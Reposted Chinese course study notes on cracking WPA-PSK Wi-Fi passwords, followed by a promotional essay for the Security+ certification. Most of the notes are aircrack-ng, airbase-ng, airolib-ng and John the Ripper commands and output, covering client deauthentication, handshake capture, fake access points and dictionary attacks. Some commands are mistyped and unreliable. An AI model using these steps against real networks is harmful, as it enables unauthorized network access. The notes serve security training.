安全牛学习笔记WPA攻击
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了安全牛学习笔记WPA攻击相关的知识,希望对你有一定的参考价值。
WPA PSK攻击 只有一种密码破解方法 WPA不存在WEP的弱点 只能暴力破解 CPU资源 时间 字典质量 网上共享的字典 泄露密码 地区电话号码段 Crunch生成字典 kali中自带的字典文件 |
WPA PSK攻击 PSK破解过程 启动monitor 开始抓包并保存 Deauthentication攻击获取4步握手信息 使用字典暴力破解 |
[email protected]:~# service network-manager stop
[email protected]:~# airmon-ng check kill
Killing these processes:
FID NAME
989 wpa_supplicant
1025 dhclient
[email protected]:~# airmon-ng start wlan0
NO interfering processes found
PHY Interface Driver Chipest
phy0 wlan2 ath9k_htc Atheros Communications, Inc, AR9271 802.11n
(mac80211 monitor mode vif enable for [phy0]wlan2 on [phy0]wlan2mon)
(mac80211 station mode vif disabled for [phy0]wlan2)
[email protected]:~# iwconfig
eth0 no wireless extensions
wlan0mon IEEE 802.11bgn Mode:Monitor Frequency:2.57 GHz Tx-Power=20 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:off
lo no wireless extensions.
[email protected]:~# airodump-ng wlan0mon
[email protected]:~# airodump-ng wlan0mon --bssid EC:25:CA:DC:29:B6 -c 11 -w wpa
[email protected]:~# airoplay-ng -0 2 -a EC:25:CA:DC:29:B6 -c 50:3E:34:30:0F:AA wlan0mon
[email protected]:~# ls
wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml
[email protected]:~# ls wpa*
wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml
[email protected]:~# cd /usr/share/john/ 字典目录
[email protected]:/usr/share/john# ls password.list
[email protected]:/usr/share/john# more password.list
[email protected]:/usr/share/john# grep Password password.list
Password
[email protected]:~# aircrack-ng -w /usr/share/john/password.list wpa-01.cap
密码是Password
[email protected]:~# cd /usr/share/wfuzz/wordlist/
fuzzdb/ general/ Injections/ others/ stress/ vulns/ webservicces/
[email protected]:~# cd /usr/share/wfuzz/wordlist/fuzzdb/
attack-playloads/ dbcs/ web-backdoors/ wordlists-user-passwd/
Discovery/ regex/ wordlists-misc/
[email protected]:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-
wordlists-misc/ wordlists-user-passwd/
[email protected]:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc/
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# ls
common-http-ports.txt us_cities.txt wordlist-alpharumeric-case.txt wordlist-common-snmp-community-strings.txt wordlist-dns.txt
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat common-http-ports.txt
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cat us_cities.txt
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-misc# cd ..
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/#cd wordlists-user-passwd/
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd# cd passwd/
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# ls
john.txt phpbb.txt twltter.txt woksauce.txt
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cat john.txt | wc -l
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cat phpbb.txt | wc -l
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# aircrack-ng -w phpbb.txt /root/wpa-01.cap
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/ wordlists-user-passwd/passwd# cd
[email protected]:~# cd /usr/share/wfuzz/wordlist/fuzzdb/wordlists-usr-passwd/passwds#
[email protected]:/usr/share/wfuzz/wordlist/fuzzdb/wordlists-usr-passwd/passwds#
[email protected]:~# cd /usr/share/
[email protected]:/usr/share# ls
[email protected]:/usr/share# cd wordlists/
[email protected]:/usr/share/wordlists# ls
dirb dirbuster dnsmap.txt Fasttrack.txt fern-wifi metasploit metasploit-jtr namp.lst rockyou.txt.gz sqlmap.txt termineter.txt wfuzz
[email protected]:/usr/share/wordlists# ls rockyou.txt.gz -l
-rw-r--r-- 1 root root 53357341 3月 3 2013 rockyou.txt.gz
[email protected]:/usr/share/wordlists# ls rockyou.txt.gz -l -h
-rw-r--r-- 1 root root 51M 3月 3 2013 rockyou.txt.gz
[email protected]:/usr/share/wordlists# gunzip rockyou.txt.gz
[email protected]:/usr/share/wordlists# ls
dirb dirbuster dnsmap.txt fasttrack.txt fern-wifi metasploit metasploit-jtr nmap.lst rockyou.txt sqlmap.txt terminter.txt wfuzz
[email protected]:/usr/share/wordlists# cat rockyou.txt | wc -l
14344392
[email protected]:/usr/share/wordlists#
aircrack-ng -w rockyou.txt /root/wpa-01.cap
密码是password
[email protected]:~# airodump-ng --essid kifi wlan0mon
[email protected]:~# airodump-ng --bssid EC:26:CA:DC:29:B5 -c 11 wlan0monn -w wpa
[email protected]:~# ls
wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml wpa-02.cap wpa-02.csv wap-02.kismet.csv wpawap-02.kismet.netxml
[email protected]:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap
[email protected]:~# grep Password135 /usr/share/wordlists/rockyou.txt
WPA PSK攻击 无AP情况下的WPA密码破解 启动monitor 开始抓包并保存 根据probe信息伪造相同ESSID的AP 抓取四步握手中的前两个包 使用字典暴力破解 |
[email protected]:~# airodump-ng wlan0mon
[email protected]:~# rm wpa-01.*
[email protected]:~# airodump-ng wlan0man
[email protected]:~# airbase-ng -h
sage: airbase-ng <options> <replay interface>
Options
-a bssid : set Access Point MAC address
-i iface : capture packets from this interface
-w WEP key : use this WEP key to encrypt/decrypt packets
-h MAC : source mac for MITM mode
-f disallow : disallow specified client MACs (default: allow)
-W 0|1 : [don‘t] set WEP flag in beacons 0|1 (default: auto)
-q : quiet (do not print statistics)
-v : verbose (print more messages) (long --verbose)
-M : M-I-T-M between [specified] clients and bssids (NOT CURRENTLY IMPLEMENTED)
-A : Ad-Hoc Mode (allows other clients to peer) (long --ad-hoc)
-Y in|out|both : external packet processing
-c channel : sets the channel the AP is running on
-X : hidden ESSID (long --hidden)
-s : force shared key authentication
-S : set shared key challenge length (default: 128)
-L : Caffe-Latte attack (long --caffe-latte)
-N : Hirte attack (cfrag attack), creates arp request against wep client (long –cfrag)
-x nbpps : number of packets per second (default: 100)
-y : disables responses to broadcast probes
-0 : set all WPA,WEP,open tags. can‘t be used with -z & -Z
-z type : sets WPA1 tags. 1=WEP40 2=TKIP 3=WRAP 4=CCMP 5=WEP104
-Z type : same as -z, but for WPA2
-V type : fake EAPOL 1=MD5 2=SHA1 3=auto
-F prefix : write all sent and received frames into pcap file
-P : respond to all probes, even when specifying ESSIDs
-I interval : sets the beacon interval value in ms
-C seconds : enables beaconing of probed ESSID values (requires -P)
Filter options:
--bssid <MAC> : BSSID to filter/use (short -b)
--bssids <file> : read a list of BSSIDs out of that file (short -B)
--client <MAC> : MAC of client to accept (short -d)
--clients <file> : read a list of MACs out of that file (short -D)
--essid <ESSID> : specify a single ESSID (short -e)
--essids <file> : read a list of ESSIDs out of that file (short -E)
Help:
--help: Displays the usage screen (short -H)
[email protected]:~# airbase-ng --essid lcon -c 11 wlan0mon //伪装AP
18:44:04 Created tap interface at0
18:44:04 Trying to set MTU on at0 to 1500
18:44:04 Trying to set MTU on wlan0mon to 1800
18:44:04 Access point with DSSID C8:3A:35:CA:46:91 started.
[email protected]:~# tnux //分屏
[email protected]:~# airbase --essid kifi -c 11 wlan0mon
[email protected]:~# airbase --essid kifi -c 11 -z 2 wlan0mon
[email protected]:~# airbase --essid kifi -c 11 -Z 4 wlan0mon
[email protected]:~# airodump-ng wlan0mon
[email protected]:~# airodump-ng wlan0mon --essid kifi
[email protected]:~# airodump-ng wlan0mon --essid kifi -w wpa
[email protected]:~# airodump-ng wlan0mon --essid kifi -w wpa -c 11
[email protected]:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-0
wpa-01.cap wpa-01.csv wap-01.kismet.csv wpawap-01.kismet.netxml wpa-02.cap wpa-02.csv wap-02.kismet.csv wpawap-02.kismet.netxml
[email protected]:~# aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-02.cap
AIROLIB破解密码 设计用于存储ESSID和密码列表 计算生成不变的PMK(计算资源消耗型) PMK在破解阶段被用于计算PTK(速度快,计算资源要求少) 通过完整性摘要值破解密码 SQLlite3数据库存储数据 |
AIROLIB破解密码 echo kifi > essid.txt airolib-ng db --import essid essid.txt airolib-ng db --stats airolib-ng db --import passwd <wordlist> 自动剔除不合格的WPA字典 airolib-ng db --batch 生成PMK aircrack-ng -r db wpa.cap |
[email protected]:~# echo kifi > essid.txt
[email protected]:~# cat essid.txt
kifi
[email protected]:~# airolib-ng db --import essid essid.txt
[email protected]:~# airolib-ng db --stats
There are 1 ESSID and 0 passwords in the database,0 out of 0 possible conbinations have been computed (0%)
ESSID Priority Done
kifi 64 (null)
[email protected]:~# airolib-ng db --import passwd /usr/share/wordlists/rockyou.txt
[email protected]:~# airolib-ng db --import passwd /usr/share/john/passwrod.lst
[email protected]:~# airolib-ng db --stats
There are 1 ESSID and 0 passwords in the database,0 out of 0 possible conbinations have been computed (0%)
ESSID Priority Done
kifi 64 0.0
[email protected]:~# airolib-ng --batch
Computed 652 PNK in 14 soconds (46 PMK/s, 0 in buffer). ALL ESSID processod.
[email protected]:~# aircrack-ng -r db wpa-02.cap
Opening wpa-02.cap
Read 9258 packets
# BSSID ESSID Encryption
1 C8:3A:35:CA:46:91 kifi WPA (1 handshake)
Choosing first network as target.
Opening wpa-02.cap
Reading packetsm, please wait...
Aircack-ng 1.2 rc2
[email protected]:~# cat /usr/share/wordlists/rockyou.txt | head -n 200000 > dict.txt
[email protected]:~# more dict.txt
[email protected]:~# airolib-ng db --import password dict.txt
Reading file
Writing...as read,121538 invalid lines ignored.
Done
[email protected]:~# airolib-ng db --batch
JTR破解密码 John the ripper 快速的密码破解软件 支持基于规则扩展密码字典 很多人系统用书记号码做无线密码 获取号段并利用JTR规则增加最后几位的数字 配置文件/etc/john/john.conf [list.Rules:Wordlist] $[0-9]$[0-9]$[0-9] |
[email protected]:~# gedit
[email protected]:~# top //系统的性能
[email protected]:~# aircrack-ng -r db wpa-02.cap
Opening wpa-02.cap
Read 9258 packets
# BSSID ESSID Encryption
1 C8:3A:35:CA:46:91 kifi WPA (1 handshake)
Choosing first network as target.
Opening wpa-02.cap
Reading packetsm, please wait...
Aircack-ng 1.2 rc2
[email protected]:~# cat yd.txt
[email protected]:~# vi /etc/john/john.conf
/list.Rules:Wordlist
在最后加上密码规则
$[0-9]$[0-9]$[0-9]
JTR破解密码 测试效果 john --wordlist=passwrod.list --rules --stdout | grep -i Password123 破解调用 john --wroldlist=pass.list --rules --stdout | aricrack-ng -e kifi -w - wap.cap 北京联通手机号密码破解 |
[email protected]:~# john --wordlist=yd.txt --rules --stdout
[email protected]:~# ls yd.txt -lh
-rw-r--r-- 1 root root 561 11月 10 19:57 yd.txt
[email protected]:~# john --wroldlist=yd.txt --rules --stdout | aricrack-ng -e kifi -w - wap02.cap
该笔记为安全牛课堂学员笔记,想看此课程或者信息安全类干货可以移步到安全牛课堂
Security+认证为什么是互联网+时代最火爆的认证?
牛妹先给大家介绍一下Security+
Security+ 认证是一种中立第三方认证,其发证机构为美国计算机行业协会CompTIA ;是和CISSP、ITIL 等共同包含在内的国际 IT 业 10 大热门认证之一,和CISSP偏重信息安全管理相比,Security+ 认证更偏重信息安全技术和操作。
通过该认证证明了您具备网络安全,合规性和操作安全,威胁和漏洞,应用程序、数据和主机安全,访问控制和身份管理以及加密技术等方面的能力。因其考试难度不易,含金量较高,目前已被全球企业和安全专业人士所普遍采纳。
Security+认证如此火爆的原因?
原因一:在所有信息安全认证当中,偏重信息安全技术的认证是空白的, Security+认证正好可以弥补信息安全技术领域的空白 。
目前行业内受认可的信息安全认证主要有CISP和CISSP,但是无论CISP还是CISSP都是偏重信息安全管理的,技术知识讲的宽泛且浅显,考试都是一带而过。而且CISSP要求持证人员的信息安全工作经验都要5年以上,CISP也要求大专学历4年以上工作经验,这些要求无疑把有能力且上进的年轻人的持证之路堵住。在现实社会中,无论是找工作还是升职加薪,或是投标时候报人员,认证都是必不可少的,这给年轻人带来了很多不公平。而Security+的出现可以扫清这些年轻人职业发展中的障碍,由于Security+偏重信息安全技术,所以对工作经验没有特别的要求。只要你有IT相关背景,追求进步就可以学习和考试。
原因二: IT运维人员工作与翻身的利器。
在银行、证券、保险、信息通讯等行业,IT运维人员非常多,IT运维涉及的工作面也非常广。是一个集网络、系统、安全、应用架构、存储为一体的综合性技术岗。虽然没有程序猿们“生当做光棍,死亦写代码”的悲壮,但也有着“锄禾日当午,不如运维苦“的感慨。天天对着电脑和机器,时间长了难免有对于职业发展的迷茫和困惑。Security+国际认证的出现可以让有追求的IT运维人员学习网络安全知识,掌握网络安全实践。职业发展朝着网络安全的方向发展,解决国内信息安全人才的匮乏问题。另外,即使不转型,要做好运维工作,学习安全知识取得安全认证也是必不可少的。
原因三:接地气、国际范儿、考试方便、费用适中!
CompTIA作为全球ICT领域最具影响力的全球领先机构,在信息安全人才认证方面是专业、公平、公正的。Security+认证偏重操作且和一线工程师的日常工作息息相关。适合银行、证券、保险、互联网公司等IT相关人员学习。作为国际认证在全球147个国家受到广泛的认可。
在目前的信息安全大潮之下,人才是信息安全发展的关键。而目前国内的信息安全人才是非常匮乏的,相信Security+认证一定会成为最火爆的信息安全认证。
本文出自 “11662938” 博客,请务必保留此出处http://11672938.blog.51cto.com/11662938/1967653
以上是关于安全牛学习笔记WPA攻击的主要内容,如果未能解决你的问题,请参考以下文章